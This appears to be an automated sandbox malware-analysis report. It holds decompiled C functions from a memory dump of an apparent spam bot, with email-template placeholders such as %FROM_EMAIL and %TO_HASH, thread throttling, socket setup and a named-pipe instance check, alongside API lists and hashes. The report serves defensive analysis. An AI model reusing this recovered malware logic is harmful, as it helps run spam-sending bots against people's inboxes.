                                                                                                                                  0x00402127
                                                                                                                                  0x00402127
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402114
                                                                                                                                  0x00000000
                                                                                                                                  0x00402116
                                                                                                                                  0x00402116
                                                                                                                                  0x00402117
                                                                                                                                  0x00402120
                                                                                                                                  0x00402125
                                                                                                                                  0x0040212b
                                                                                                                                  0x0040212d
                                                                                                                                  0x0040212d
                                                                                                                                  0x0040213f
                                                                                                                                  0x00402151
                                                                                                                                  0x00402159
                                                                                                                                  0x00402160
                                                                                                                                  0x0040216a
                                                                                                                                  0x00402170
                                                                                                                                  0x00402189
                                                                                                                                  0x00402197
                                                                                                                                  0x0040219c
                                                                                                                                  0x004021a1
                                                                                                                                  0x004021c1
                                                                                                                                  0x004021c1
                                                                                                                                  0x004021a3
                                                                                                                                  0x004021a3
                                                                                                                                  0x004021a7
                                                                                                                                  0x00000000
                                                                                                                                  0x004021a9
                                                                                                                                  0x004021ad
                                                                                                                                  0x004021ae
                                                                                                                                  0x004021b6
                                                                                                                                  0x004021b9
                                                                                                                                  0x004021b9
                                                                                                                                  0x004021a7
                                                                                                                                  0x004021a1
                                                                                                                                  0x004021d1
                                                                                                                                  0x004021da
                                                                                                                                  0x004021e7
                                                                                                                                  0x004021ed
                                                                                                                                  0x004021f5
                                                                                                                                  0x004021f5
                                                                                                                                  0x00402204

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402078
                                                                                                                                  • GetTickCount.KERNEL32 ref: 004020D4
                                                                                                                                  • GetTickCount.KERNEL32 ref: 004020DB
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040212B
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402132
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402142
                                                                                                                                    • Part of subcall function 0040F04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,0040E342,00000000,745CF210,80000001,00000000,0040E513,?,00000000,00000000,?,000000E4), ref: 0040F089
                                                                                                                                    • Part of subcall function 0040F04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,0040E342,00000000,745CF210,80000001,00000000,0040E513,?,00000000,00000000,?,000000E4,000000C8), ref: 0040F093
                                                                                                                                    • Part of subcall function 0040E854: lstrcpyA.KERNEL32(00000001,?,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E88B
                                                                                                                                    • Part of subcall function 0040E854: lstrlenA.KERNEL32(00000001,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E899
                                                                                                                                    • Part of subcall function 00401C5F: wsprintfA.USER32 ref: 00401CE1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$Time$FileSystem$lstrcpylstrlenwsprintf
                                                                                                                                  • String ID: 0 v$localcfg$net_type$rbl_bl$rbl_ip
                                                                                                                                  • API String ID: 3976553417-1551482228
                                                                                                                                  • Opcode ID: e666061d80d691fc6b112011ec25e37af1bccbb964f924a1abaaf546849d61ae
                                                                                                                                  • Instruction ID: 2c4ade229706ff5e66d1d9a19171a9bb61e55472092035c31cb102c4d2320628
                                                                                                                                  • Opcode Fuzzy Hash: e666061d80d691fc6b112011ec25e37af1bccbb964f924a1abaaf546849d61ae
                                                                                                                                  • Instruction Fuzzy Hash: CF51F3706043465ED728EB21EF49B9A3BD4BB04318F10447FE605E62E2DBFC9494CA1D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040B3C5 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 145COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                  			E0040B3C5(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v132;
				void* _t46;
				char* _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t76;
				void* _t77;

				E00405CE1(_a4, 0x3e800, _a16, 0, 0);
				E0040EF00( &_v132, "%FROM_EMAIL");
				E00405CE1( &_v132, 0x64, _a16, 0, 0);
				_t71 = E0040ED03( &_v132, 0x40);
				_t77 = _t76 + 0x38;
				_t83 = _t71;
				if(_t71 != 0) {
					_t7 = _t71 + 1; // 0x1
					E0040EF7C(_t83, _a4, "%FROM_DOMAIN", _t7, 0x3e800, 0);
					 *_t71 = 0;
					E0040EF7C(_t83, _a4, "%FROM_USER",  &_v132, 0x3e800, 0);
					_t77 = _t77 + 0x28;
				}
				_t72 = _a12;
				E0040EF7C(_t83, _a4, "%TO_DOMAIN",  *((intOrPtr*)(_t72 + 0xc)), 0x3e800, 0);
				wsprintfA( &_v132, "%s@%s",  *((intOrPtr*)(_t72 + 8)),  *((intOrPtr*)(_t72 + 0xc)));
				E0040EF7C(_t83, _a4, "%TO_EMAIL",  &_v132, 0x3e800, 0);
				_t73 = _a4;
				E0040EF7C(_t83, _t73, "%TO_USER",  *((intOrPtr*)(_t72 + 4)), 0x3e800, 0);
				_t46 = E0040F0CB( &_v132);
				_push(0);
				_push( &_v132);
				_push(_t46);
				E0040F133();
				E0040EF7C(_t83, _t73, "%TO_HASH",  &_v132, 0x3e800, 0);
				_push(_t73);
				E0040AD89( &_v132, _t83);
				E0040B211(0,  &_v132, 0);
				E0040EF7C(_t83, _t73, "%DATE",  &_v132, 0x3e800, 0);
				E0040B211(0,  &_v132, 5);
				E0040EF7C(_t83, _t73, "%P5DATE",  &_v132, 0x3e800, 0);
				E0040B211(0,  &_v132, 0xfffffffb);
				E0040EF7C(_t83, _t73, "%M5DATE",  &_v132, 0x3e800, 0);
				_t75 = _a8;
				 *((char*)(E0040AEDD(_t75, _t73, 0x3e800) + _t75)) = 0;
				return _t75;
			}











                                                                                                                                  0x0040b3e1
                                                                                                                                  0x0040b3ef
                                                                                                                                  0x0040b3ff
                                                                                                                                  0x0040b40f
                                                                                                                                  0x0040b411
                                                                                                                                  0x0040b414
                                                                                                                                  0x0040b416
                                                                                                                                  0x0040b41a
                                                                                                                                  0x0040b426
                                                                                                                                  0x0040b439
                                                                                                                                  0x0040b43b
                                                                                                                                  0x0040b440
                                                                                                                                  0x0040b440
                                                                                                                                  0x0040b443
                                                                                                                                  0x0040b453
                                                                                                                                  0x0040b467
                                                                                                                                  0x0040b47b
                                                                                                                                  0x0040b485
                                                                                                                                  0x0040b48e
                                                                                                                                  0x0040b49a
                                                                                                                                  0x0040b49f
                                                                                                                                  0x0040b4a3
                                                                                                                                  0x0040b4a4
                                                                                                                                  0x0040b4a5
                                                                                                                                  0x0040b4b6
                                                                                                                                  0x0040b4bb
                                                                                                                                  0x0040b4bc
                                                                                                                                  0x0040b4c7
                                                                                                                                  0x0040b4d8
                                                                                                                                  0x0040b4e7
                                                                                                                                  0x0040b4f8
                                                                                                                                  0x0040b504
                                                                                                                                  0x0040b515
                                                                                                                                  0x0040b51e
                                                                                                                                  0x0040b52b
                                                                                                                                  0x0040b534

                                                                                                                                  APIs
                                                                                                                                  • wsprintfA.USER32 ref: 0040B467
                                                                                                                                    • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
                                                                                                                                    • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
                                                                                                                                    • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$wsprintf
                                                                                                                                  • String ID: %DATE$%FROM_DOMAIN$%FROM_EMAIL$%FROM_USER$%M5DATE$%P5DATE$%TO_DOMAIN$%TO_EMAIL$%TO_HASH$%TO_USER$%s@%s
                                                                                                                                  • API String ID: 1220175532-2340906255
                                                                                                                                  • Opcode ID: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
                                                                                                                                  • Instruction ID: bf34ba3998127a8345ca8177a6a798a4e2b1dcf0281bd89f40bace4b7f612c60
                                                                                                                                  • Opcode Fuzzy Hash: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
                                                                                                                                  • Instruction Fuzzy Hash: CE4174B254011D7EDF016B96CCC2DFFBB6CEF4934CB14052AF904B2181EB78A96487A9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040C2DC Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 182threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                  			E0040C2DC(void* __ebp, signed int _a4) {
				void* _t86;
				signed int _t90;
				signed int _t91;
				long _t93;
				signed int _t95;
				signed int _t101;
				signed int _t108;
				signed int _t112;
				signed int _t115;
				long _t117;
				long _t118;
				signed int _t120;
				struct _SECURITY_ATTRIBUTES* _t122;
				signed int _t123;
				signed int _t132;
				signed int _t148;
				signed char _t151;
				signed int _t154;
				signed int _t156;
				signed char* _t157;
				void* _t158;
				signed int _t163;

				_t158 = __ebp;
				_t157 = _a4;
				E0040A4C7(_t157);
				_t122 = 0;
				if(_t157[0x44] == 0) {
					_t157[8] = 0;
					_t157[0x34] = 0;
					_t157[0x38] = 0;
					_t157[0x3c] = 0;
					_t157[0x54] = 0;
					_t157[0x40] = 0;
					_t157[0x58] = 0;
					L31:
					_t82 =  &(_t157[4]); // 0x40c4e4
					_t86 = _t82;
					_t148 =  !( *_t157) & 0x00000001;
					_t157[0x5c] = _t122;
					_t84 =  &(_t157[8]); // 0xfffffdf0
					if( *_t86 >=  *_t84) {
						L34:
						return _t86;
					}
					_t86 = CreateThread(_t122, _t122, E0040B535, InterlockedIncrement(_t86) | _t148 << 0x00000010, _t122, _t122);
					if(_t86 == _t122) {
						goto L34;
					}
					return CloseHandle(_t86);
				}
				if(_t157[8] != 0) {
					__eflags = _t157[0x48];
					if(_t157[0x48] == 0) {
						L5:
						_t12 =  &(_t157[0x10]); // 0x59be026a
						_t90 =  *_t12;
						_t157[8] = _t90;
						_t157[0x34] = _t90;
						_t91 = _t90 * 0x3e8;
						__eflags = _t91;
						_t157[0x38] = _t122;
						_t157[0x3c] = _t122;
						_t157[0x1c] = _t90 * 0x2710;
						_t157[0x20] = _t91;
						goto L6;
					}
					_t118 = GetTickCount();
					_t11 =  &(_t157[0x48]); // 0x13740041
					__eflags = _t118 -  *_t11 - 0x927c0;
					if(_t118 -  *_t11 < 0x927c0) {
						goto L6;
					}
					goto L5;
				} else {
					_t4 =  &(_t157[0xc]); // 0x5756c359
					_t120 =  *_t4;
					_t157[0x1c] = _t120 * 0x2710;
					_t157[8] = _t120;
					_t157[0x20] = _t120 * 0x3e8;
					_t157[0x34] = _t120;
					_t157[0x48] = GetTickCount();
					L6:
					if(( *_t157 & 0x00000001) == 0) {
						_t73 =  &(_t157[0x34]); // 0xa1c35e5f
						_t157[8] =  *_t73;
						goto L31;
					}
					_t93 = GetTickCount();
					_t21 =  &(_t157[0x4c]); // 0x26fce850
					if(_t93 -  *_t21 >= 0x2710) {
						goto L31;
					}
					if(_t157[0x54] == _t122) {
						_t95 = 0x3e8;
					} else {
						_t117 = GetTickCount();
						_t23 =  &(_t157[0x54]); // 0x41366c1d
						_t95 = _t117 -  *_t23;
					}
					_t123 = _t95;
					if(_t95 < 1) {
						_t123 = 1;
					}
					if(_t123 > 0x4e20) {
						_t123 = 0x4e20;
					}
					_t24 =  &(_t157[0x58]); // 0x701d8900
					_t25 =  &(_t157[0x40]); // 0x74c33b57
					_t151 =  *_t25;
					_t132 =  *_t24 * 0x3e8;
					_push(_t158);
					asm("cdq");
					_push(0x14);
					_a4 = _t123;
					asm("cdq");
					_t101 = (_t132 - _t151) * _t123 / 0x3e8 / 0x3e8;
					if(_t101 == 0) {
						__eflags = _t132 - _t151;
						if(__eflags == 0) {
							goto L22;
						}
						if(__eflags >= 0) {
							_t156 = _t151 + 1;
							__eflags = _t156;
						} else {
							_t156 = _t151 - 1;
						}
						goto L21;
					} else {
						_t156 = _t151 + _t101;
						L21:
						_t157[0x40] = _t156;
						L22:
						if(_t157[0x40] < 0) {
							_t157[0x40] = _t157[0x40] & 0x00000000;
						}
						_t39 =  &(_t157[0x40]); // 0x74c33b57
						_t163 = (0xc8 -  *_t39) * 0x14;
						if(_t123 > 0x3e8) {
							_a4 = 0x3e8;
						}
						asm("cdq");
						_t46 =  &(_t157[0x14]); // 0x5f004120
						_t47 =  &(_t157[0x10]); // 0x59be026a
						asm("cdq");
						_t49 =  &(_t157[0x30]); // 0xe4754f45
						_t54 =  &(_t157[0x20]); // 0x406a0000
						_t108 = E0040A505(_t163 * _a4 / 0x3e8 /  *_t49 +  *_t54,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
						asm("cdq");
						_t56 =  &(_t157[0x2c]); // 0xc68314c4
						_t157[0x20] = _t108;
						_t112 = E0040A505(_t163 /  *_t56 + _t108,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
						asm("cdq");
						_t122 = 0;
						_t157[0x58] = 0;
						_t154 = _t112 / 0x3e8;
						_t157[0x54] = GetTickCount();
						_t68 =  &(_t157[0x34]); // 0xa1c35e5f
						_t115 =  *_t68;
						if(_t115 <= _t154) {
							_t157[8] = _t115;
							_t157[0x20] = _t115 * 0x3e8;
						} else {
							_t157[8] = _t154;
							_t157[0x1c] = _t154 * 0x2710;
						}
						goto L31;
					}
				}
			}

























                                                                                                                                  0x0040c2dc
                                                                                                                                  0x0040c2de
                                                                                                                                  0x0040c2e4
                                                                                                                                  0x0040c2e9
                                                                                                                                  0x0040c2ef
                                                                                                                                  0x0040c482
                                                                                                                                  0x0040c485
                                                                                                                                  0x0040c488
                                                                                                                                  0x0040c48b
                                                                                                                                  0x0040c48e
                                                                                                                                  0x0040c491
                                                                                                                                  0x0040c494
                                                                                                                                  0x0040c497
                                                                                                                                  0x0040c499
                                                                                                                                  0x0040c499
                                                                                                                                  0x0040c4a0
                                                                                                                                  0x0040c4a3
                                                                                                                                  0x0040c4a6
                                                                                                                                  0x0040c4a9
                                                                                                                                  0x0040c4d5
                                                                                                                                  0x0040c4d5
                                                                                                                                  0x0040c4d5
                                                                                                                                  0x0040c4c1
                                                                                                                                  0x0040c4c9
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040c4cc
                                                                                                                                  0x0040c2fe
                                                                                                                                  0x0040c326
                                                                                                                                  0x0040c329
                                                                                                                                  0x0040c337
                                                                                                                                  0x0040c337
                                                                                                                                  0x0040c337
                                                                                                                                  0x0040c342
                                                                                                                                  0x0040c345
                                                                                                                                  0x0040c348
                                                                                                                                  0x0040c348
                                                                                                                                  0x0040c34e
                                                                                                                                  0x0040c351
                                                                                                                                  0x0040c354
                                                                                                                                  0x0040c357
                                                                                                                                  0x00000000
                                                                                                                                  0x0040c357
                                                                                                                                  0x0040c32b
                                                                                                                                  0x0040c32d
                                                                                                                                  0x0040c330
                                                                                                                                  0x0040c335
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040c300
                                                                                                                                  0x0040c300
                                                                                                                                  0x0040c300
                                                                                                                                  0x0040c30b
                                                                                                                                  0x0040c316
                                                                                                                                  0x0040c319
                                                                                                                                  0x0040c31c
                                                                                                                                  0x0040c321
                                                                                                                                  0x0040c35a
                                                                                                                                  0x0040c35d
                                                                                                                                  0x0040c47a
                                                                                                                                  0x0040c47d
                                                                                                                                  0x00000000
                                                                                                                                  0x0040c47d
                                                                                                                                  0x0040c363
                                                                                                                                  0x0040c365
                                                                                                                                  0x0040c36d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040c376
                                                                                                                                  0x0040c37f
                                                                                                                                  0x0040c378
                                                                                                                                  0x0040c378
                                                                                                                                  0x0040c37a
                                                                                                                                  0x0040c37a
                                                                                                                                  0x0040c37a
                                                                                                                                  0x0040c384
                                                                                                                                  0x0040c389
                                                                                                                                  0x0040c38d
                                                                                                                                  0x0040c38d
                                                                                                                                  0x0040c395
                                                                                                                                  0x0040c397
                                                                                                                                  0x0040c397
                                                                                                                                  0x0040c399
                                                                                                                                  0x0040c39c
                                                                                                                                  0x0040c39c
                                                                                                                                  0x0040c39f
                                                                                                                                  0x0040c3ac
                                                                                                                                  0x0040c3ad
                                                                                                                                  0x0040c3b5
                                                                                                                                  0x0040c3b8
                                                                                                                                  0x0040c3bc
                                                                                                                                  0x0040c3bd
                                                                                                                                  0x0040c3c1
                                                                                                                                  0x0040c3c7
                                                                                                                                  0x0040c3c9
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040c3cb
                                                                                                                                  0x0040c3d0
                                                                                                                                  0x0040c3d0
                                                                                                                                  0x0040c3cd
                                                                                                                                  0x0040c3cd
                                                                                                                                  0x0040c3cd
                                                                                                                                  0x00000000
                                                                                                                                  0x0040c3c3
                                                                                                                                  0x0040c3c3
                                                                                                                                  0x0040c3d1
                                                                                                                                  0x0040c3d1
                                                                                                                                  0x0040c3d4
                                                                                                                                  0x0040c3d8
                                                                                                                                  0x0040c3da
                                                                                                                                  0x0040c3da
                                                                                                                                  0x0040c3e3
                                                                                                                                  0x0040c3eb
                                                                                                                                  0x0040c3f0
                                                                                                                                  0x0040c3f2
                                                                                                                                  0x0040c3f2
                                                                                                                                  0x0040c3fd
                                                                                                                                  0x0040c405
                                                                                                                                  0x0040c408
                                                                                                                                  0x0040c419
                                                                                                                                  0x0040c41a
                                                                                                                                  0x0040c41d
                                                                                                                                  0x0040c421
                                                                                                                                  0x0040c42a
                                                                                                                                  0x0040c42b
                                                                                                                                  0x0040c430
                                                                                                                                  0x0040c436
                                                                                                                                  0x0040c43b
                                                                                                                                  0x0040c443
                                                                                                                                  0x0040c448
                                                                                                                                  0x0040c44b
                                                                                                                                  0x0040c453
                                                                                                                                  0x0040c456
                                                                                                                                  0x0040c456
                                                                                                                                  0x0040c45c
                                                                                                                                  0x0040c46c
                                                                                                                                  0x0040c475
                                                                                                                                  0x0040c45e
                                                                                                                                  0x0040c45e
                                                                                                                                  0x0040c467
                                                                                                                                  0x0040c467
                                                                                                                                  0x00000000
                                                                                                                                  0x0040c45c
                                                                                                                                  0x0040c3c1

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040A4C7: GetTickCount.KERNEL32 ref: 0040A4D1
                                                                                                                                    • Part of subcall function 0040A4C7: InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040C31F
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040C32B
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040C363
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040C378
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040C44D
                                                                                                                                  • InterlockedIncrement.KERNEL32(0040C4E4), ref: 0040C4AE
                                                                                                                                  • CreateThread.KERNEL32 ref: 0040C4C1
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,0040C4E0,00413588,00408810), ref: 0040C4CC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$Interlocked$CloseCreateExchangeHandleIncrementThread
                                                                                                                                  • String ID: 0 v$localcfg
                                                                                                                                  • API String ID: 1553760989-2166502722
                                                                                                                                  • Opcode ID: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
                                                                                                                                  • Instruction ID: d79c9f10581ee3273b6165e92ba068ddd4f199cf4cd09fd02743c11af2233124
                                                                                                                                  • Opcode Fuzzy Hash: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
                                                                                                                                  • Instruction Fuzzy Hash: 0E515CB1A00B41CFC7249F6AC5D552ABBE9FB48304B509A3FE58BD7A90D778F8448B14
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040F315 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 103networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • htons.WS2_32(0040CA1D), ref: 0040F34D
                                                                                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 0040F367
                                                                                                                                  • closesocket.WS2_32(00000000), ref: 0040F375
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: closesockethtonssocket
                                                                                                                                  • String ID: time_cfg
                                                                                                                                  • API String ID: 311057483-2401304539
                                                                                                                                  • Opcode ID: 2a826acfe3cae001ba33e046207a1606f0b733d4175eb994d9abd389a0737888
                                                                                                                                  • Instruction ID: 30084693e0db7c5d018f03cf39b97fa82366a7d059792586ebb4172a1a3c68ff
                                                                                                                                  • Opcode Fuzzy Hash: 2a826acfe3cae001ba33e046207a1606f0b733d4175eb994d9abd389a0737888
                                                                                                                                  • Instruction Fuzzy Hash: AA319E72900118ABDB20DFA5DC859EF7BBCEF88314F104176F904E3190E7788A858BA9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040405E Relevance: 16.7, APIs: 11, Instructions: 203COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                  			E0040405E(void* __ecx) {
				unsigned int _v8;
				unsigned int _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v40;
				void* _t40;
				void* _t43;
				void* _t49;
				void* _t56;
				void* _t62;
				void* _t64;
				long _t71;
				void* _t82;
				void* _t92;
				void* _t93;
				void* _t95;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t103;
				void* _t104;

				_t95 = __ecx;
				_v8 = 0;
				_t40 = CreateEventA(0, 1, 1, 0);
				_v16 = _t40;
				if(_t40 != 0) {
					_t43 = E00404000(E00403ECD(_t95),  &_v20);
					_t97 = _t98;
					_t102 = 0x7d0;
					_t92 = 0x100;
					_t99 = 0x4122f8;
					if(_t43 == 0) {
						L10:
						E0040EE2A(_t97, _t99, 0, _t92);
						_t104 = _t103 + 0xc;
						_t93 = 0xa;
						while(1) {
							_t93 = _t93 - 1;
							_t99 = CreateNamedPipeA(E00403ECD(_t97), 0x40000003, 0, 0xff, 0x64, 0x64, 0x64, 0);
							if(_t99 != 0xffffffff) {
								break;
							}
							Sleep(0x1f4);
							if(_t93 != 0) {
								continue;
							}
							CloseHandle(_v16);
							return 0;
						}
						L14:
						while(1) {
							do {
								L14:
								while(1) {
									do {
										if(ConnectNamedPipe(_t99, 0) != 0) {
											goto L16;
										}
										_t71 = GetLastError();
										asm("sbb eax, eax");
										if( ~(_t71 - 0x217) + 1 == 0) {
											L25:
											DisconnectNamedPipe(_t99);
											continue;
										}
										L16:
										_t49 = E00403F8C(_t99,  &_v12, 4, _v16, _t102);
										_t104 = _t104 + 0x14;
									} while (_t49 == 0);
									_t92 = _v16;
									_v8 = (_v12 >> 2) + _v12;
									E00403F18(_t99,  &_v8, 4, _t92, _t102);
									_t56 = E00403F8C(_t99,  &_v12, 4, _t92, _t102);
									_t104 = _t104 + 0x28;
									if(_t56 == 0 || _v12 != (_v8 >> 2) + _v8) {
										goto L25;
									} else {
										_t62 = E00403F8C(_t99,  &_v28, 8, _t92, _t102);
										_t104 = _t104 + 0x14;
										if(_t62 == 0 || _v24 != 0xc) {
											goto L25;
										} else {
											_t64 = E00403F8C(_t99,  &_v40, 0xc, _t92, _t102);
											_t104 = _t104 + 0x14;
											if(_t64 == 0) {
												goto L25;
											}
											break;
										}
									}
								}
							} while (_v28 != 1);
							E00403F18(_t99,  &_v8, 4, _t92, _t102);
							_t103 = _t104 + 0x14;
							if(_v32 == 0) {
								_t102 = CloseHandle;
								CloseHandle(_t99);
								CloseHandle(_t92);
								E0040E318();
								L8:
								ExitProcess(0);
							}
							 *0x41215a =  *0x41215a + 1;
						}
					}
					E0040EE2A(_t97, 0x4122f8, 0, 0x100);
					_t103 = _t103 + 0xc;
					if(_v20 == 0xffffffff) {
						goto L10;
					}
					_v12 = E0040ECA5();
					E00403F18(_v20,  &_v12, 4, _v16, 0x7d0);
					_t82 = E00403F8C(_v20,  &_v8, 4, _v16, 0x7d0);
					_t103 = _t103 + 0x28;
					if(_t82 == 0 || _v8 != (_v12 >> 2) + _v12) {
						CloseHandle(_v20);
						goto L10;
					} else {
						_v8 = _v8 + (_v8 >> 2);
						E00403F18(_v20,  &_v8, 4, _v16, 0x7d0);
						_t103 = _t103 + 0x14;
						goto L8;
					}
				}
				return 0;
			}



























                                                                                                                                  0x0040405e
                                                                                                                                  0x0040406d
                                                                                                                                  0x00404070
                                                                                                                                  0x00404076
                                                                                                                                  0x0040407b
                                                                                                                                  0x00404090
                                                                                                                                  0x00404096
                                                                                                                                  0x00404097
                                                                                                                                  0x0040409c
                                                                                                                                  0x004040a1
                                                                                                                                  0x004040a8
                                                                                                                                  0x00404130
                                                                                                                                  0x00404134
                                                                                                                                  0x00404139
                                                                                                                                  0x0040413e
                                                                                                                                  0x0040413f
                                                                                                                                  0x00404153
                                                                                                                                  0x00404160
                                                                                                                                  0x00404165
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040416c
                                                                                                                                  0x00404174
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00404179
                                                                                                                                  0x00000000
                                                                                                                                  0x00404182
                                                                                                                                  0x00000000
                                                                                                                                  0x00404188
                                                                                                                                  0x00404188
                                                                                                                                  0x00000000
                                                                                                                                  0x00404188
                                                                                                                                  0x00404188
                                                                                                                                  0x00404193
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00404195
                                                                                                                                  0x004041a2
                                                                                                                                  0x004041a5
                                                                                                                                  0x0040425e
                                                                                                                                  0x0040425f
                                                                                                                                  0x00000000
                                                                                                                                  0x0040425f
                                                                                                                                  0x004041ab
                                                                                                                                  0x004041b6
                                                                                                                                  0x004041bb
                                                                                                                                  0x004041be
                                                                                                                                  0x004041c5
                                                                                                                                  0x004041d0
                                                                                                                                  0x004041da
                                                                                                                                  0x004041e8
                                                                                                                                  0x004041ed
                                                                                                                                  0x004041f2
                                                                                                                                  0x00000000
                                                                                                                                  0x00404202
                                                                                                                                  0x0040420b
                                                                                                                                  0x00404210
                                                                                                                                  0x00404215
                                                                                                                                  0x00000000
                                                                                                                                  0x0040421d
                                                                                                                                  0x00404226
                                                                                                                                  0x0040422b
                                                                                                                                  0x00404230
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00404230
                                                                                                                                  0x00404215
                                                                                                                                  0x004041f2
                                                                                                                                  0x00404232
                                                                                                                                  0x00404245
                                                                                                                                  0x0040424a
                                                                                                                                  0x00404251
                                                                                                                                  0x0040426a
                                                                                                                                  0x00404271
                                                                                                                                  0x00404274
                                                                                                                                  0x00404276
                                                                                                                                  0x0040411f
                                                                                                                                  0x00404121
                                                                                                                                  0x00404121
                                                                                                                                  0x00404253
                                                                                                                                  0x00404253
                                                                                                                                  0x00404188
                                                                                                                                  0x004040b2
                                                                                                                                  0x004040b7
                                                                                                                                  0x004040be
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004040c9
                                                                                                                                  0x004040d5
                                                                                                                                  0x004040e7
                                                                                                                                  0x004040ec
                                                                                                                                  0x004040f1
                                                                                                                                  0x0040412a
                                                                                                                                  0x00000000
                                                                                                                                  0x00404101
                                                                                                                                  0x0040410b
                                                                                                                                  0x00404117
                                                                                                                                  0x0040411c
                                                                                                                                  0x00000000
                                                                                                                                  0x0040411c
                                                                                                                                  0x004040f1
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00404070
                                                                                                                                  • ExitProcess.KERNEL32 ref: 00404121
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
